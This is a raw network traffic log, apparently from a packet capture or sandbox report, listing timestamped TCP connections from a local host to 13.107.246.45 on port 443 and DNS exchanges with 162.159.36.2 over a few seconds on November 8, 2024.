Nov 8, 2024 16:15:52.458842039 CET	49877	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.458848000 CET	443	49877	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.554557085 CET	443	49884	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.554617882 CET	443	49884	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.554672003 CET	49884	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.554891109 CET	49884	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.554915905 CET	443	49884	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.554925919 CET	49884	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.554934025 CET	443	49884	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.557461023 CET	49888	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.557554007 CET	443	49888	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.557631969 CET	49888	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.557766914 CET	49888	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.557800055 CET	443	49888	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.588469028 CET	443	49877	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.588498116 CET	443	49877	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.588574886 CET	443	49877	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.588674068 CET	49877	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.588674068 CET	49877	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.588839054 CET	49877	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.588861942 CET	443	49877	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.588871956 CET	49877	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.588877916 CET	443	49877	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.591720104 CET	49889	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.591772079 CET	443	49889	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:52.591869116 CET	49889	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.592036963 CET	49889	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:52.592052937 CET	443	49889	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.021389008 CET	443	49885	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.022699118 CET	49885	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.022733927 CET	443	49885	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.023066998 CET	49885	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.023077011 CET	443	49885	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.150688887 CET	443	49885	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.150717974 CET	443	49885	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.150764942 CET	443	49885	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.150810957 CET	49885	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.150846004 CET	49885	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.151067019 CET	49885	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.151087046 CET	443	49885	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.151098967 CET	49885	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.151104927 CET	443	49885	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.168076992 CET	443	49886	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.174242973 CET	49890	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.174308062 CET	443	49890	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.174400091 CET	49890	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.174566031 CET	49886	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.174591064 CET	443	49886	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.186224937 CET	49886	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.186240911 CET	443	49886	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.186501980 CET	49890	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.186566114 CET	443	49890	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.187232018 CET	443	49887	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.188951015 CET	49887	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.188977003 CET	443	49887	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.204875946 CET	49887	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.204899073 CET	443	49887	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.298120975 CET	443	49888	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.310463905 CET	443	49886	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.310548067 CET	443	49886	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.310616970 CET	49886	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.325015068 CET	443	49889	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.333602905 CET	443	49887	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.333662987 CET	443	49887	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.333733082 CET	49887	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.344434023 CET	49888	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.344506979 CET	443	49888	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.345037937 CET	49888	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.345072031 CET	443	49888	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.345216990 CET	49886	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.345273972 CET	443	49886	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.345292091 CET	49886	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.345299959 CET	443	49886	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.346940994 CET	49889	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.346962929 CET	443	49889	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.347517014 CET	49889	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.347523928 CET	443	49889	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.347690105 CET	49887	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.347711086 CET	443	49887	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.347723007 CET	49887	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.347728014 CET	443	49887	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.350805998 CET	49891	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.350837946 CET	443	49891	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.350893974 CET	49891	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.351042986 CET	49891	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.351063013 CET	443	49891	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.351957083 CET	49892	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.351996899 CET	443	49892	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.352060080 CET	49892	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.352238894 CET	49892	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.352252960 CET	443	49892	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.472417116 CET	443	49889	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.472501993 CET	443	49889	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.472559929 CET	49889	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.472719908 CET	49889	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.472742081 CET	443	49889	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.472753048 CET	49889	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.472759962 CET	443	49889	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.475613117 CET	49893	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.475670099 CET	443	49893	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.475758076 CET	49893	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.475894928 CET	49893	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.475908995 CET	443	49893	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.591515064 CET	443	49888	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.591579914 CET	443	49888	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.591655970 CET	49888	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.591859102 CET	49888	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.591908932 CET	443	49888	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.591955900 CET	49888	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.591973066 CET	443	49888	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.595052004 CET	49894	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.595098019 CET	443	49894	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.595181942 CET	49894	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.595345020 CET	49894	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.595356941 CET	443	49894	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.942342997 CET	443	49890	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.942784071 CET	49890	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.942821980 CET	443	49890	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:53.943231106 CET	49890	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:53.943236113 CET	443	49890	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.041011095 CET	63266	53	192.168.2.10	162.159.36.2
Nov 8, 2024 16:15:54.045903921 CET	53	63266	162.159.36.2	192.168.2.10
Nov 8, 2024 16:15:54.046004057 CET	63266	53	192.168.2.10	162.159.36.2
Nov 8, 2024 16:15:54.046036959 CET	63266	53	192.168.2.10	162.159.36.2
Nov 8, 2024 16:15:54.050978899 CET	53	63266	162.159.36.2	192.168.2.10
Nov 8, 2024 16:15:54.076189995 CET	443	49890	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.076256037 CET	443	49890	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.076311111 CET	49890	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.076531887 CET	49890	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.076554060 CET	443	49890	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.076565981 CET	49890	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.076570988 CET	443	49890	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.079643965 CET	63267	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.079669952 CET	443	63267	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.079791069 CET	63267	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.079942942 CET	63267	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.079952955 CET	443	63267	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.093698025 CET	443	49891	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.094196081 CET	49891	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.094242096 CET	443	49891	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.094660997 CET	49891	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.094670057 CET	443	49891	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.095081091 CET	443	49892	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.095346928 CET	49892	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.095365047 CET	443	49892	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.095705986 CET	49892	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.095711946 CET	443	49892	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.229505062 CET	443	49891	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.229578972 CET	443	49891	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.229662895 CET	49891	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.229902029 CET	49891	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.229923964 CET	443	49891	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.229937077 CET	49891	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.229943037 CET	443	49891	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.231113911 CET	443	49892	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.231385946 CET	443	49892	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.231445074 CET	49892	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.231492996 CET	49892	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.231509924 CET	443	49892	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.231522083 CET	49892	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.231528044 CET	443	49892	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.233721018 CET	63268	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.233768940 CET	443	63268	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.233834982 CET	63268	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.234528065 CET	63269	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.234550953 CET	443	63269	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.234607935 CET	63269	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.234689951 CET	63268	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.234699011 CET	443	63268	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.234786034 CET	63269	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.234795094 CET	443	63269	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.267235041 CET	443	49893	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.268040895 CET	49893	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.268062115 CET	443	49893	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.268510103 CET	49893	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.268515110 CET	443	49893	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.336011887 CET	443	49894	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.336819887 CET	49894	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.336858034 CET	443	49894	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.337302923 CET	49894	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.337308884 CET	443	49894	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.474951982 CET	443	49894	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.475044012 CET	443	49894	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.475099087 CET	49894	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.475265980 CET	49894	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.475286961 CET	443	49894	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.475296021 CET	49894	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.475302935 CET	443	49894	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.478315115 CET	63270	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.478372097 CET	443	63270	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.478437901 CET	63270	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.478602886 CET	63270	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.478621960 CET	443	63270	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.563329935 CET	443	49893	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.563359022 CET	443	49893	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.563416958 CET	443	49893	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.563438892 CET	49893	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.563483953 CET	49893	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.563683987 CET	49893	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.563716888 CET	443	49893	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.563738108 CET	49893	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.563745975 CET	443	49893	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.571795940 CET	63271	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.571836948 CET	443	63271	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.571898937 CET	63271	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.572329998 CET	63271	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.572344065 CET	443	63271	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.651851892 CET	53	63266	162.159.36.2	192.168.2.10
Nov 8, 2024 16:15:54.652539968 CET	63266	53	192.168.2.10	162.159.36.2
Nov 8, 2024 16:15:54.658263922 CET	53	63266	162.159.36.2	192.168.2.10
Nov 8, 2024 16:15:54.658325911 CET	63266	53	192.168.2.10	162.159.36.2
Nov 8, 2024 16:15:54.849700928 CET	443	63267	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.850260973 CET	63267	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.850289106 CET	443	63267	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.850780964 CET	63267	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.850786924 CET	443	63267	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.976521015 CET	443	63268	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.977049112 CET	63268	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.977087975 CET	443	63268	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.977498055 CET	63268	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.977505922 CET	443	63268	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.981234074 CET	443	63269	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.981651068 CET	63269	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.981672049 CET	443	63269	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.982101917 CET	63269	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.982106924 CET	443	63269	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.985542059 CET	443	63267	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.985615969 CET	443	63267	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.985737085 CET	63267	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.985910892 CET	63267	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.985934019 CET	443	63267	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.985946894 CET	63267	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.985953093 CET	443	63267	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.988812923 CET	63273	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.988852978 CET	443	63273	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:54.988922119 CET	63273	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.989103079 CET	63273	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:54.989114046 CET	443	63273	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.114537001 CET	443	63269	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.114562035 CET	443	63269	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.114614010 CET	443	63269	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.114645958 CET	63269	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.114676952 CET	63269	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.114949942 CET	63269	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.114974976 CET	443	63269	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.114988089 CET	63269	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.115000963 CET	443	63269	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.118443012 CET	63274	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.118494034 CET	443	63274	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.118585110 CET	63274	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.118721008 CET	63274	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.118733883 CET	443	63274	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.195416927 CET	443	63270	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.196048021 CET	63270	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.196089029 CET	443	63270	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.196505070 CET	63270	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.196515083 CET	443	63270	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.211285114 CET	443	63268	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.211363077 CET	443	63268	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.211436033 CET	63268	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.211638927 CET	63268	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.211668015 CET	443	63268	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.211682081 CET	63268	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.211688995 CET	443	63268	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.214570999 CET	63275	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.214602947 CET	443	63275	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.214693069 CET	63275	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.214922905 CET	63275	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.214934111 CET	443	63275	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.292390108 CET	443	63271	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.295440912 CET	63271	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.295469999 CET	443	63271	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.295959949 CET	63271	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.295964003 CET	443	63271	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.322876930 CET	443	63270	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.323195934 CET	443	63270	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.323261023 CET	443	63270	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.323297024 CET	63270	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.323348999 CET	63270	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.323384047 CET	63270	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.323412895 CET	443	63270	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.323426008 CET	63270	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.323431969 CET	443	63270	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.326296091 CET	63276	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.326345921 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.326436996 CET	63276	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.326637983 CET	63276	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.326653957 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.420705080 CET	443	63271	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.420742035 CET	443	63271	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.420783043 CET	63271	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.420794010 CET	443	63271	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.420836926 CET	63271	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.421019077 CET	63271	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.421042919 CET	443	63271	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.421056986 CET	63271	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.421061993 CET	443	63271	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.425903082 CET	63277	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.425946951 CET	443	63277	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.426004887 CET	63277	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.426597118 CET	63277	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.426609039 CET	443	63277	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.727135897 CET	443	63273	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.747272968 CET	63273	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.747288942 CET	443	63273	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:55.751152992 CET	63273	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:55.751162052 CET	443	63273	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.092005014 CET	443	63273	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.092063904 CET	443	63273	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.092107058 CET	63273	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.092308998 CET	63273	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.092329979 CET	443	63273	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.092340946 CET	63273	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.092346907 CET	443	63273	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.094059944 CET	443	63274	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.094451904 CET	63274	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.094471931 CET	443	63274	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.094867945 CET	443	63275	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.094881058 CET	63274	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.094887018 CET	443	63274	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.095135927 CET	63275	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.095144033 CET	443	63275	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.095184088 CET	63279	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.095233917 CET	443	63279	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.095293045 CET	63279	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.095446110 CET	63279	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.095457077 CET	443	63279	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.095477104 CET	63275	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.095480919 CET	443	63275	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.219964981 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.220980883 CET	63276	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.221004963 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.221534967 CET	63276	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.221544027 CET	443	63276	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.223042965 CET	443	63274	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.223176956 CET	443	63274	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.223222971 CET	443	63274	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:56.223234892 CET	63274	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.223277092 CET	63274	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:56.223330021 CET	63274	443	192.168.2.10	13.107.246.45
